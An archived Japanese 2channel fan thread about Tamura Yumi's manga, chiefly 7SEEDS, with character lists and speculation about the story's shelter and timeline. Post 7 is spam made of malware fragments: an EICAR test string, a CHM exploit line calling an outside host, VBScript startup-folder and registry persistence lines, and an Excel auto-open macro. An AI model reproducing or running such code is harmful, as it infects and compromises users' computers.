2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■田村由美作品20■

1 :花と名無しさん:2006/10/23(月) 01:05:59 ID:???0
「BASARA」「巴がゆく」「シカゴ」「7SEEDS」
他、田村由美作品についてマターリ語りましょう。
現在「フラワーズ」にて7SEEDS連載。
単行本は9巻まで発売中。

【 注 意 !】
・sage進行でお願いします。
 原則として>>970が次スレ立て。

・各チームのデータ、 過去ログ及び関連スレは>>2-10あたり
 最低限、先に目を通してからスレに参加してください。
(できれば現行スレを全部読んでからが望ましいです)

・最新号のネタバレ解禁は発売日午後より。
 最新号のあらすじが知りたければ、早売りスレに行きましょう。
【早売りゲッター】総合スレ・十四冊目【ネタバレ】
http://comic6.2ch.net/test/read.cgi/gcomic/1160614052/l50

前スレ
■田村由美作品19■
http://comic6.2ch.net/test/read.cgi/gcomic/1158484465/l50

2 :花と名無しさん:2006/10/23(月) 01:07:06 ID:???0
7SEEDS登場人物まとめ

【春】 (花・ハルは鷹弘と共に別行動中)
末黒野 花(17) 元水泳部の高2 サバイバル技術に長ける 東京出身
雪間 ハル(16) 音楽一家に育つピアノ弾き 東京出身 

甘茶 藤子(17) 医学部志望の高校生 茨城出身
角又 万作(18) 座禅・唐詩を好む寺の四男坊 弓道二段
鯛網  ちさ(18) 大臣出が多い良家のお嬢様 石川出身
野火桃太郎(12) 神童の名高い少年 宮城出身
新草ひばり(?)  解凍失敗のためか目覚めず 詳細不明
柳  踏青(?)  死亡(捕食/自殺) ガイド・自衛隊出身


【夏B】 (ナツ・嵐・蝉丸は船地点、百舌も別行動)
岩清水ナツ(16) 登校拒否の高1 埼玉出身
青田 嵐(17)  水泳部所属の高2 東京出身
麻井 蝉丸(18) 不安定な母子家庭に育つ不良青年 浜松出身

百舌(?)     サバイバル技術に長ける以外一切詳細不詳

守宮ちまき(19) 美大1年 熊本出身
天道まつり(16) プチ家出中のコギャル 実家は農家
草刈 蛍(12)  異常に勘がきく少女
早乙女牡丹(?)  ガイド・元婦人警官

3 :花と名無しさん:2006/10/23(月) 01:08:24 ID:???0
【秋】 (2派に分裂中)
稲架 秋ヲ(?) T大卒(在学?)青年実業家
猪垣 蘭(?)  設計を専門にしてる?
刈田 葉月(?) オリンピック級の柔道家
八巻 朔也(?) 将棋の名人(法学部?)

荻原 流星(?) パラグライダー乗り?くるみの子の父?
鹿野くるみ(?)  牧場の子?気が弱そう 妊娠中?
梨本 茜(?)   海女さんの家系の生まれ
十六夜良夜(?) ガイド・消防士

【冬】
新巻  鷹弘 50年に一人のピッチャーと呼ばれる高校球児 神奈川出身
鮫島  吹雪 死亡(捕食) 今世紀最高のショートと呼ばれる高校球児 広島出身
神楽坂美鶴 死亡(自殺) 日本舞踏界のホープ 高校野球マニア
枯園  睦月 死亡(捕食/自殺) 一度見た風景は忘れないT大1年
柴漬 アラレ 死亡(解凍失敗)
綾取  風花 死亡(解凍失敗)
室咲  冬至 死亡(解凍失敗)
熊川  冴 死亡(捕食) ガイド


4 :花と名無しさん:2006/10/23(月) 01:09:47 ID:???0
【夏A】
種にするための優秀な人材として生まれた時から特殊施設で育てられた。
おそらく試験管ベビーで全員名字もなく、名前のみ。

安居 …火・水クラス
涼  …火・水 クラス
小瑠璃…風・医療クラス
源五郎…動物・植物クラス
鷭  …医療・動物クラス
あゆ …植物クラス、もう一つのクラスは不明
虹子 …土・植物クラス
卯浪 …ガイド 死亡(メンバーによって銃殺)


5 :花と名無しさん:2006/10/23(月) 01:10:43 ID:???0
過去ログ
http://artemis.s77.xrea.com/gclog/tamura/

関連スレ
田村由美 「BASARA(バサラ)」 Part6 (懐かし漫画板)
http://comic6.2ch.net/test/read.cgi/rcomic/1151484412/l50


7SEEDSラジオドラマ発売中。全三巻。
ttp://www.bestack.co.jp/

夏チーム:岩清水ナツ…南里侑香/青田嵐…鳥海浩輔
     麻井蝉丸…小西克幸/早乙女牡丹…高島雅羅
     百舌…井上和彦  ほか
冬チーム:新巻鷹弘…佐々木望/鮫島吹雪…檜山修之
     神楽坂美鶴…久川綾  ほか
春チーム:末黒野花…雪野五月/甘茶藤子…山田美穂
     角又万作…置鮎龍太郎/雪間ハル…保志総一朗

6 :花と名無しさん:2006/10/23(月) 01:12:12 ID:???0
よく話題にのぼるネタ

・7SEEDSの時代はBASARAの世界に繋がっているのでは?
 九州が分断されている、生態系が違いすぎるなど、理由はいろいろありますが
 別物と考えたほうがいいです。
 作者はおそらく、同じものとして描いていないと思われます。

・百舌=死神なの?夏Aの誰か?
 9巻で要先輩が行く気であると判明。名字は百舌戸。
 ただ夏Aの安居が半分白髪になったこともあり、まだ確実ではない。
 涼・茂説もまだあり。(茂は厳しいか?)
 
・花の父親は?
 貴士先生 と妻・美帆の間の娘と判明。
 要も共に養育にあたる。


7 :<body onload=window()>:2006/10/23(月) 02:17:15 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


8 :花と名無しさん:2006/10/23(月) 10:23:45 ID:???O
>>1
乙です。

9 :花と名無しさん:2006/10/23(月) 14:30:20 ID:???O
>>1
乙華麗!

10 :花と名無しさん:2006/10/24(火) 14:00:53 ID:???O
後四日かあ。保守。

11 :花と名無しさん:2006/10/25(水) 02:05:57 ID:???O
またウイルス?
なんとかならんの…

12 :花と名無しさん:2006/10/25(水) 07:39:20 ID:???0
ウザいことは確かだな

13 :花と名無しさん:2006/10/25(水) 14:40:38 ID:???0
夏Bチーム

1)ルパン三世(犯罪者)
2)次元 大介(犯罪者)
3)石川五右衛門(犯罪者)
4)峰 不二子(犯罪者)
5)瞳(犯罪者)
6)浜野あさり(パー)
7)のびのびた(パー)
ガイド 銭形警部

14 :花と名無しさん:2006/10/25(水) 15:06:02 ID:???0
諸星あたるも入れてやってください

15 :花と名無しさん:2006/10/25(水) 16:13:03 ID:???0
>>13
平均年齢高めでも、めちゃめちゃ生き延びそうなメンツだなw
>14も入れて、後先考えず子孫繁栄(行為)に尽力するだろし。

16 :花と名無しさん:2006/10/25(水) 16:33:00 ID:???0
ルパンはフランス人なんですか、日本人なんですかっ?

17 :花と名無しさん:2006/10/25(水) 16:43:09 ID:???0
6と7がカップル確定になるんだろうか…
産まれる子供の出来が不安すぎる。

18 :花と名無しさん:2006/10/25(水) 16:54:14 ID:???0
>17 
バカと天才は紙一重というぞ


19 :花と名無しさん:2006/10/25(水) 16:56:28 ID:???0
>>13
wwちょwwwwwおまwwww
でもチームワークはめちゃくちゃ良さそうだ

20 :花と名無しさん:2006/10/25(水) 18:48:20 ID:???0
>>15
生き延びそうってより30年たっても誰も外見全く変わらなさそうな面子ばかりなんですがwww

21 :花と名無しさん:2006/10/25(水) 18:55:05 ID:???0
>>16
自分で日本人だと言ってなかったか?でもそれじゃあおかしいか。ハーフかな?

22 :花と名無しさん:2006/10/25(水) 19:34:26 ID:???O
話ぶった斬ってスイマセンが、ネタバレってどこでつか?

23 :花と名無しさん:2006/10/25(水) 23:19:40 ID:???O
日本語で(ry
それと>>1

24 :花と名無しさん:2006/10/26(木) 00:09:42 ID:???0
瞳ってどの瞳?

25 :花と名無しさん:2006/10/26(木) 00:25:37 ID:???0
キャッツアイの瞳と思ったけど、違う?

26 :花と名無しさん:2006/10/26(木) 03:37:30 ID:???0
>>16
おじいさんがアルセーヌ・ルパンらしいから
クォーターでは?

27 :花と名無しさん:2006/10/26(木) 12:26:47 ID:???O
シェルターにいた人々はどこかに行ったんじゃなく全滅したのは確定?で、あの死体は最後の一人。
早けりゃ明日には読んだ人のレスが来るな。その時は自分で読むまでしばらく退散するが。

28 :花と名無しさん:2006/10/26(木) 13:31:06 ID:???O
実際読んだ人のレスは、知る限り来たことないぞ
バレ読んだ人のあいまいレスなら来るけど
解禁日時はだいたい守られてるとオモ


29 :花と名無しさん:2006/10/26(木) 13:57:57 ID:???O
ごめん、それも間接的に読んでしまったような気になるからw 私の問題なんで気にしないで。

30 :花と名無しさん:2006/10/27(金) 12:36:11 ID:o2EiIXJ20
みんなの検定ってご存知ですか?
7タネの検定探したのですが、なかったので作ってみました。
稚拙でお恥ずかしいのですが、良かったら試してみてください。

http://minna.cert.yahoo.co.jp/drqe/6825

31 :花と名無しさん:2006/10/27(金) 12:36:54 ID:???0
2


32 :花と名無しさん:2006/10/27(金) 14:55:02 ID:???O
バレ見てきた
明日がワクテカすぎる
しかしこのペースだと夏B再登場は一年後位かw

33 :花と名無しさん:2006/10/27(金) 18:17:33 ID:???0
>>30
モドシタケが二つあんぞ。
懲罰房5日。

34 :花と名無しさん:2006/10/27(金) 21:56:55 ID:???0
ずっと思ってたのだけれど、NEWSの手越くんって、茂くんに似てない?

35 :花と名無しさん:2006/10/27(金) 23:34:12 ID:???0
>>33
修正しました。
受験してくれた方々、申し訳ありませんでした。
懲罰房で反省します。

36 :花と名無しさん:2006/10/27(金) 23:42:52 ID:???0
早く今月号読んであーでもないこーでもないって書き込みたいよな。
しっかし悲惨な展開だ。生きてても死んでても地獄。

37 :花と名無しさん:2006/10/28(土) 12:16:01 ID:???O
かいきーん
まさか夏ABより先にこいつを見ることになろうとは

38 :花と名無しさん:2006/10/28(土) 12:38:36 ID:???O
ああ、また鬼展開をじっくり見せられるんかー。orz 日記の回想ですら漫画でやるとなると、夏A
とこれ以外にも過去編はやりかねないな。

39 :花と名無しさん:2006/10/28(土) 12:43:16 ID:???0
それだけ、現在リアルタイムでサバイバル中の皆の話かくことないんでは?


40 :花と名無しさん:2006/10/28(土) 12:58:42 ID:???0
親の最期を娘が読む、て何気にドラマな展開ではある。
花は気付かないままなのかな。
美帆はどうしたんだろう。

41 :花と名無しさん:2006/10/28(土) 13:06:24 ID:???O
あんまり地道に生活基盤を築いていく日常は描くつもりないみたいだね。襲い掛かる獣や自然をど
う倒し克服するかに主眼が置かれてるわけでもない。あくまで人同士の話なのはわかってたけど。
破滅が予想されてる話を続けて見るのはしんどくなってきたな…w

42 :花と名無しさん:2006/10/28(土) 14:16:03 ID:???0
>>38
夏Aはもう過去編やってるし、やるとしたら秋でしょ。

43 :花と名無しさん:2006/10/28(土) 14:30:28 ID:???O
夏Aと今の日記以外にも過去話をやるかも、という意味よ。Xデー直前までの話とか、百舌の中の
人が今の殻に閉じこもった雰囲気になるまでの話とか。秋はどうかね。今までのメンバーの説明で
十分理解できる荒み方だしな〜。

44 :花と名無しさん:2006/10/28(土) 15:35:52 ID:???O
次号のたむさんの執筆量、すごいな。

45 :花と名無しさん:2006/10/28(土) 16:10:33 ID:???O
毎回言われてるが、夏B側はどう盛り上げる気なんだろ。

46 :花と名無しさん:2006/10/28(土) 16:27:51 ID:???0
いつかXデーのことは描かなくてはいけなかったろうし、貴士がいる以上、花か夏A絡みで描かれるのも妥当かな。
クライマックス前のこの時期に描いておくのもちょうどいいんだろうな。
果たして、少しは貴士先生の名誉回復イベントになるか更に評判を落すことになるか楽しみ。
>>45
今んとこ嵐以外に盛り上げる背景がないからなあ。個人的にはナツに何か秘密ごとがあるんじゃないかと思ってるん
だけど。

47 :花と名無しさん:2006/10/28(土) 17:19:12 ID:???O
秘密かあ。私個人は、素性は平凡だけど、実は元の世界で鷹と接触していた!…りしないかなーと思う。
少なくとも弟がいるから知ってそう。それ以外に弟の存在理由が特にないような気がするので。

48 :花と名無しさん:2006/10/28(土) 17:48:09 ID:???O
先月の気味悪い人形ってピートだよね。
入り口でひからびていりのがマークか…?

49 :花と名無しさん:2006/10/28(土) 17:54:01 ID:???O
マークが今までの男性キャラの中で一番好みなんだけど
あの腐乱死体なんだよなあonz

50 :花と名無しさん:2006/10/28(土) 17:57:13 ID:???O
濃ゆいオッサンキャラが二人も出てきたのにオバハンキャラがいないのは不公平><

51 :花と名無しさん:2006/10/28(土) 18:43:18 ID:???0
政府は七種が保険のつもりなんだろうが要や貴士らは端からこちらが本命一本って感じだし、
竜宮シェルターは駄目と判ってても政治的な駆け引きの結果用意せざるをえなかったんだろうな

52 :花と名無しさん:2006/10/28(土) 19:51:19 ID:???0
さて今月の話で要のかの字も出てこなかったわけだが

53 :花と名無しさん:2006/10/28(土) 20:12:22 ID:???O
竜宮みたいなシェルターがいくつかあるって言ってたから
要は他のシェルターにいるって可能性もあるな
まあ普通に考えればすでに冷凍されてるって事なんだろうけど

つうかお偉いさん達は隕石衝突を知ってたんだよね
竜宮の中にその人達や家族はいないのかな

54 :花と名無しさん:2006/10/28(土) 22:06:50 ID:???0
>>49
そこがいいんじゃないかw


「しんど」で陥落しました

55 :花と名無しさん:2006/10/28(土) 22:28:24 ID:???0
貴志が百舌ではと言ってみる。
美帆さんに先立たれ、終末を一緒に過ごせなくなったので
未来に行かなくなる理由もなくなり、花を追いかけようと・・・・。

56 :花と名無しさん:2006/10/28(土) 22:29:19 ID:???0
自棄になった貴志が原因でシェルター壊滅だったらやだなぁ…

57 :花と名無しさん:2006/10/28(土) 22:38:27 ID:???0
マークが最後に扉を封印したってコトが、嘘につながるんだろうな
子供たちばっかりを集めて苦しまないように死なせるための部屋とか・・・

何はともあれ悲惨な話がまだ続くな

58 :花と名無しさん:2006/10/28(土) 22:40:29 ID:???0
いつまでも自給自足出来るっていうのが嘘なんでしょ。
例えば5年くらいしか持たないとか。
だったらそんなに人を集めるなって話になるけど。

59 :花と名無しさん:2006/10/28(土) 23:22:28 ID:???0
5,000人もの住民が居たとは予想できんかった。
そんな大人数を住まわせるとなると、相当大規模にしないと維持できんよ。
そんなものを、全国に数箇所、秘密裏に造ったのね。
まあ、現実的にはどっかでバレるよな。

60 :花と名無しさん:2006/10/28(土) 23:44:46 ID:???O
花の独白からすると、別れる前まで母親は生きてたんだよね。あの美帆とは別の人だったり…まさ
かな。貴士もXデー直後までは生きてたようだったし。

61 :花と名無しさん:2006/10/29(日) 00:43:58 ID:???0
検定第2弾&第3弾作りました。
感想などコメントに残していただけると嬉しいです。

http://minna.cert.yahoo.co.jp/drqe/6930
http://minna.cert.yahoo.co.jp/drqe/6946

62 :花と名無しさん:2006/10/29(日) 00:49:50 ID:???0
って龍宮が何を目的とした施設なのか全くわからん
あそこで冷凍保存するの?
あんな大人数の冷凍保存施設ないのに?
自給自足で地上が復活するまで暮らす?
あんな大人数を賄えるだけの広さの畑ってどれくらいの広さになると思ってるんだ?
正直何を考えてあんな施設作ったんだかさっぱりわからん

63 :花と名無しさん:2006/10/29(日) 01:01:18 ID:???0
末黒野 貴志ってことか?

64 :花と名無しさん:2006/10/29(日) 01:01:59 ID:???0
>>62
そこで共食いですよ

65 :花と名無しさん:2006/10/29(日) 01:14:36 ID:???0
>>62
食糧が大量にストックしてあって、それを食って生活しるって事なんじゃないか?

66 :花と名無しさん:2006/10/29(日) 01:22:08 ID:???0
ああいうシェルターを欲しがったのは権力者達で
貴志の方は生き残る可能性は種達だけと思いつつシェルター作りに協力し
見苦しく足掻く人々を冷ややかに観察?していたのでは?・・・などと思ってみたり。


67 :花と名無しさん:2006/10/29(日) 03:03:32 ID:???0
友達と言ってたんだけど、ロストってドラマと何か似てるよね。
無人島に流れ着いて48人だけが生き残って、シェルター見つけたり、
いかだくんで海に出て助けを探しに行ったりとか・・・・。


68 :花と名無しさん:2006/10/29(日) 03:45:47 ID:???0
腹話術の兄ちゃんのモデルは、さんまじゃないのかと思った。
口調もそうだけど、若い頃はあんな髪型しとったんよ。
さんまも人類の最後の最後まで、マシンガンのように喋り続けそう。



69 :花と名無しさん:2006/10/29(日) 05:13:40 ID:???O
漫画家の坂田時々は銀/魂の主人公坂/田/銀/時かなあ。名前だけからの予想だけど、一応アニメもやってるし。
あの条件で漫画家はどうやって役に立つんだろう。やっぱ漫画描くのか。

70 :花と名無しさん:2006/10/29(日) 07:15:20 ID:???O
坂田金時からじゃ…

71 :花と名無しさん:2006/10/29(日) 08:11:10 ID:???0
>>49
ミイラじゃなかったっけ?
まあどうせ七種達が目覚める頃に生きてるわけもないけど
どんな状況で死んだんだろうね?
「もうあかんかも」ってのが今から怖い。

72 :花と名無しさん:2006/10/29(日) 09:49:09 ID:???0
藤子F不二雄のSF短編集をいくつか繋ぐと7SEEDSの展開になる。
隕石で地球滅亡前夜シェルター入りを選別される家族とか無人島で生き残る術とか。
子供向けに描いたドラえもんしか知らない人は
SF短編集を読むと結構深かったり毒があったりでビックリする。

73 :花と名無しさん :2006/10/29(日) 09:57:27 ID:???0
訓練も教育も何も受けていない5,000人の素人集団を、閉鎖空間で生き延びさせようと言う計画に無理があると思う。
物資の面ではなんとかなっても、精神的にキツいよ。
後に残してきた家族は死んでしまって自分だけが生き残ってるなんてさ・・・・・自殺者増発しそうだ。
あ、その減少分も見越しての人数なのか?

74 :花と名無しさん:2006/10/29(日) 10:13:51 ID:???0
>>72
私は「ガンビュセスの籤」が怖かった。

貴士はシェルター組は生き残れるとは思ってないだろうね。
あの中で子孫を残してゆくっていうのは、そうとう苛酷だし。

75 :花と名無しさん:2006/10/29(日) 10:55:13 ID:???0
>>74
カンビュセスの籤の応用あるんじゃない?
生き延びるためにくじ引きで誰かを食うって話だよね

76 :花と名無しさん:2006/10/29(日) 12:46:13 ID:WDgEd0SqO
ふと思ったのだけど
隕石衝突>氷河期>生命復活>巨大魚や巨大虫が繁栄
この間って少なくとも何百万年は経ってるはずなのに紙とか死体とかあのまま残るものなのか?

77 :花と名無しさん:2006/10/29(日) 13:07:37 ID:???0
実際はそんなに年数経ってないのかも
地下鉄も形はとどめてたし

78 :花と名無しさん:2006/10/29(日) 13:16:22 ID:???O
空調きいてるから、温度や湿度は一定だし…。
まあ空調がきき続けてること自体が謎だけども。

79 :花と名無しさん:2006/10/29(日) 13:18:44 ID:???0
空気の状態によって条件はかなり変わるらしい。

80 :花と名無しさん:2006/10/29(日) 13:22:12 ID:???0
エネルギー源は何なんだ?

81 :花と名無しさん:2006/10/29(日) 13:25:51 ID:???0
地熱とか…
ごめん理科苦手なんだ

82 :花と名無しさん:2006/10/29(日) 14:57:47 ID:???0
この漫画の初期の頃から、時代設定には不可解さがあった。
>76 
のように、主要な生命が一旦絶滅して、再生だと、百万年単位での経過があると考えられる。
しかし、水没した東京、横浜方面にきた時には結構、人工の構造物が残っていた。
直近では甲子園球場とか、今回の龍宮シェルターや地下鉄にしてもそうだが。
こんな構造物はせいぜい設計上の寿命は50年くらいだ。
人がちゃんとメンテして、ようやく百年とか言っている。
現に東名高速道路などはかなり大掛かりな補修が必要になっている箇所もある。
特に鉄筋コンクリートは錆に弱い

83 :花と名無しさん:2006/10/29(日) 15:11:10 ID:???0
マンガだから

84 :花と名無しさん:2006/10/29(日) 15:15:19 ID:???0
神様がメンテしてくれたんだよ

85 :花と名無しさん:2006/10/29(日) 15:58:29 ID:???0
猿の惑星のラストだって自由の女神が残ってたジャマイカ

86 :花と名無しさん:2006/10/29(日) 16:06:23 ID:???0
少女漫画だから

87 :花と名無しさん:2006/10/29(日) 16:22:45 ID:???0
この手の話だと、今年6月頃、週刊モーニングに読みきりで載った
「HOTEL」を思い出すなあ。
人類滅亡後2千七百万年の間、地球上のすべてのDNAを復活させるべく残された
保管塔(ホテル)の話。
SF考証抜きで、ものすごい打ちのめされた。7SEED読んでたからちょっとシンクロして
泣きそうになった。

88 :花と名無しさん:2006/10/29(日) 19:08:02 ID:???0
ようするにいい加減なんだよ。作者が
読むのは考えの足りない少女やアホ女たちなんだからこの程度でいいだろ
っていうのが透けて見える。
もっと念入りに取材して資料を集めて、きちんと考証して、描いて欲しい
さいとうたかをとかを見習って欲しい。
そういう姿勢が大事だと思う

89 :花と名無しさん:2006/10/29(日) 19:11:20 ID:???O
あ〜それ見た。
管理してたコンピューターがとうとう駄目になっちゃった、という最期の時の話だったっけ。
モーニングやイブニングって、時々凄い読み切り載ってびっくりするよね。
プラネテスもモーニングだったかな。

90 :花と名無しさん:2006/10/29(日) 19:39:49 ID:???0
>>69
頼光四天王からじゃない?
坂田金時と渡辺の綱、あと誰か忘れたけど漢字がそれっぽい気がした。
それか『竜宮』とかいってるから日本の昔話の人物の寄せ集めかも。

91 :花と名無しさん:2006/10/29(日) 19:48:39 ID:???0
>>88
というか単純に作者の頭が悪い。というだけじゃ・・・・・
もしくは物知らずというだけじゃ・・・・・

92 :花と名無しさん:2006/10/29(日) 20:00:40 ID:???0
>>88
おっさんは黙ってて

93 :花と名無しさん:2006/10/29(日) 20:08:28 ID:???0
>>87
それ知ってる(・∀・)おっさん雑誌なのに妙に心に残った。
メインは宇宙船に全ての生命のDNAを搭載して宇宙に避難するかなんかだよね
そのホテルは保険のひとつで宇宙船の余った予算で作るの。
そんで人間のDNAだけは残さないの。罪を背負った罰として。

94 :花と名無しさん:2006/10/29(日) 20:10:49 ID:???0
うpれ

95 :花と名無しさん:2006/10/29(日) 20:46:12 ID:???0
ここ最近中だるみで退屈だと思ってたけど
ミイラの日記で一気に盛り返してきた。次号楽しみ

96 :花と名無しさん:2006/10/29(日) 20:49:42 ID:???0
未来日記ならぬミイラ日記とな!?

97 :花と名無しさん:2006/10/29(日) 20:54:49 ID:???0
>>2を見て…

これだけ色々な地域から集めたのに
関西人以外は全く方言を使っていない事の方が気になるw

マークかわいいよマーク

98 :花と名無しさん:2006/10/29(日) 20:57:17 ID:???0
マークの名前は茨城童子からだよね、多分

99 :花と名無しさん:2006/10/29(日) 21:19:14 ID:???0
>>98
森田童子の仲間かと思ってググってみた

ttp://ja.wikipedia.org/wiki/%E8%8C%A8%E6%9C%A8%E7%AB%A5%E5%AD%90

この像はひょっとしてギャグで建ててるのか?

100 :花と名無しさん:2006/10/29(日) 21:20:48 ID:???0
鬼…
それで牙があるのかw

101 :花と名無しさん:2006/10/29(日) 21:39:55 ID:???0
国家要人は四季の他にも日本童話も残そうとしたと。

102 :花と名無しさん:2006/10/29(日) 21:50:02 ID:???0
漫画家も多分エンタメ要員なんだろう
施設のどっかに貴士から花へのメッセージとか残ってないのかな

つか食料がどうのって言ってるけど、花達が見つけた時点でまだ植物わっさわさだったじゃない
食料は大丈夫だったんじゃないの
精神的におかしくなった方がありそう

103 :花と名無しさん:2006/10/29(日) 22:05:20 ID:???O
何年持ったんだろうな。2世代も持たなかったのだとしたら・゚・(ノД`)・゚・
春と夏Bの時間感覚では少し前まで同じ時を生きてた人々がそうなったと思うと、ぞっとするほど
切ない。

104 :花と名無しさん:2006/10/29(日) 22:15:43 ID:???0
マークさんがあんな状態だったんだから3世代はありえないと思うよきっと
日記も普通の大学ノート1冊分だし、多分年単位でもたなかったような気が…

105 :花と名無しさん:2006/10/29(日) 22:16:00 ID:???O
ミキ・マリ見て思ったけど7種の中には歌い手がいないよね。楽器はいるけど

106 :花と名無しさん:2006/10/29(日) 23:05:13 ID:???O
>>102
花たちは、人が生きられる環境になってから解凍されたんだよ。
隕石落ちてすぐに木や葉なんて…(ry

107 :花と名無しさん:2006/10/29(日) 23:18:45 ID:???O
↑文章をもう一度読み直すことを勧める。

108 :花と名無しさん:2006/10/29(日) 23:23:49 ID:???0
この、日記回想編は長くなりそうかな?
やろうと思えば、単行本一冊分くらいは話が膨らませそうだけど。


109 :花と名無しさん:2006/10/29(日) 23:27:08 ID:???0
源頼光の四天王が元ネタだとしても、坂田をアニメ化もされてる漫画家にすえるという事は
たむさん多少なりとも銀.魂知ってそうだw

110 :花と名無しさん:2006/10/29(日) 23:29:08 ID:???0
穀雨みたいに独立した章になってるわけじゃないからなあ。
ところで気になったんだけど、XDAYは9月1日で決まり?

111 :花と名無しさん:2006/10/29(日) 23:29:57 ID:???0
織田さんて要さんと話してた最後の首相になる予定の人かな

112 :花と名無しさん:2006/10/29(日) 23:34:09 ID:???O
希望としては10巻に納まるくらいの長さで…無理?

113 :花と名無しさん:2006/10/29(日) 23:57:44 ID:???O
織田さんてみて 戦国KIDSを思い出した。

114 :花と名無しさん :2006/10/30(月) 00:16:09 ID:???0
コールドスリープから醒めた種たちが見つけたのが「竜宮」ってのに、皮肉なネーミングだと思った。
逆浦島太郎か?
×印の扉を開けたら煙が出てきて、種たちが一気に老化。だったら凄いな。

115 :花と名無しさん:2006/10/30(月) 00:20:05 ID:???O
共食いはさすがに凄惨すぎてやだな。穀雨の生きたまま撹拌がグロの極致であってほしい。
しかし人間の精神の弱さを見せつけて短く終わる話となると、反乱が起きて指導者や関係者虐殺ぐ
らいはやりそうだ。

116 :花と名無しさん:2006/10/30(月) 00:30:23 ID:???0
フォローではないが、作者もある程度の研究はしているようだ。
鷹に「まだ、気候が安定していないようだ。」と発言させていたが、
最近の研究では、気候が安定していたのは、ここ数千年の間だったらしい。
地球の気候が安定した間に人類は文明を開いたとも言える。
ちなみに、過去形である。
この50年は過去に無いほど急激に気温が上昇しているからだ。
日本には世界最速クラスのスーパーコンピュータである「地球シミュレータ」なるものがあるが、
このコンピュータがはじき出した、40年後の東京の気候は、恐ろしいほどに今とは違っていた。
「地球」シェルターに閉じ込められた我々の3世代後の心配の方が・・・

117 :花と名無しさん:2006/10/30(月) 09:42:43 ID:???0
全然気にならないわけじゃないけど、なんていうか
「へーそんなんが許せない人もいるんだー」
くらいのことだなあ

118 :花と名無しさん:2006/10/30(月) 09:52:27 ID:???0
桃太郎さえ出ればなんでもいいよ

119 :花と名無しさん:2006/10/30(月) 12:42:32 ID:???0
>117
ストーリーが面白いと思えなかったら気になるかも。
もしくは面白いと思ってるからこそ手抜き設定に萎えるとか。
私も夏Aのわざとらしい不幸環境(うなみみたな先生がいて女の先生がいないとか)には白けた。


120 :花と名無しさん:2006/10/30(月) 13:42:40 ID:???0
>>116
心配しなくてもやばくなったらさらに発展した科学が解決するよ

121 :花と名無しさん:2006/10/30(月) 14:51:49 ID:???0
話に説得力が無いからだと思うな
ギャグ漫画とか超人たちが戦うバトル漫画だったらいいけど、仮にもストーリーで読ませようとしてる漫画だったら
設定とかキチンとしなくちゃ駄目だと思う
穴だらけの設定とか馬鹿すぎる大人たちとか、そういうところが目について白けてしまう部分だと思う

122 :花と名無しさん:2006/10/30(月) 15:52:57 ID:???O
滅亡前の日本が、まるで今の日本と同じ姿のように読んでしまいそうになるけど、
でもあれだって架空の日本でしょう?
狼輸入してたりとか、コールドスリープが可能になったりとか、
夏Aは完全に試験管ベビーで女の体から産まれてないんじゃ?って話もスレで出たことある。
穴が穴なのか、伏線なのか、設定的に実は穴じゃなかったりするのかは、
まだわかんないよ。

123 :花と名無しさん:2006/10/30(月) 16:01:44 ID:???O
人の心理描写はそれなり以上に説得力はあるでしょ。色々細かい所まで行き届いてないのは確かだ
けど。そういうのがいつまでも気になって楽しめないなら合ってないってことだな。

124 :花と名無しさん:2006/10/30(月) 23:05:45 ID:???0
話豚切スマソ。
今日始めてこの人の長編以外の作品読んだんだけど
すげえな。
ホラー系自体初めて読んだけど「針の眼」すげえ怖かった。
安直だがしばらく煙草控えようと思ったくらいだ。

125 :花と名無しさん:2006/10/31(火) 00:23:09 ID:???O
美人歌姫:ミキ・マリには反応しなかったのに、野球選手には食い付く鷹がカワユス。

126 :花と名無しさん:2006/10/31(火) 00:56:42 ID:???0
>>124
自分もそれ読んでから歩き煙草はやめた。

127 :花と名無しさん:2006/10/31(火) 09:43:09 ID:???0
隕石群の襲来を直前までガセネタでごまかそうとしてたみたいだけど
なんぼなんでも無理がありすぎ
世界中の政府が同調して「そんな噂、嘘ですー」と言い張り科学者たちを黙らせなきゃならないわけでしょ、
大半の人間が何も知らされずに死ぬ、そんな情報封鎖が通じるわけない

128 :花と名無しさん:2006/10/31(火) 10:53:51 ID:???O
だから少しは情報が漏れてるみたいだったじゃない。無理があるのを承知でやってたんでしょう。

129 :花と名無しさん:2006/10/31(火) 13:27:15 ID:???0
そういうのも全部「政府or政治家がやった」で済ますんですよ。
夏Aグループを作るに当たっての、試験管で人工授精+おそらく発展途上国の女性による代理出産費用、
孤島や施設の用意、関係者の口封じ等などの莫大な金額も政治家が出せるそうですからw
こっそり政府の金を使った事にするにしても、こっそりで使える金額じゃないし
人類存亡の危機という非常事態とはいえ同じ政党内でも猛反対があるでしょ。
物語は面白いと思ってるんだけどね、たまに雑さも気になるのよ。

130 :花と名無しさん:2006/10/31(火) 14:20:29 ID:???0
そこまでリアリティ求めて漫画読んでて疲れない?

131 :花と名無しさん:2006/10/31(火) 14:23:05 ID:???O
本当に出来ないと思っている?
現実だっていろんな事に関してそうでしょう。
政治家が全部隠してやっているって、むしろリアリティあるけど。

132 :花と名無しさん:2006/10/31(火) 14:54:36 ID:???0
政治ってそんな単純じゃないよ。
マジでそんなことにリアリティを感じられるの?
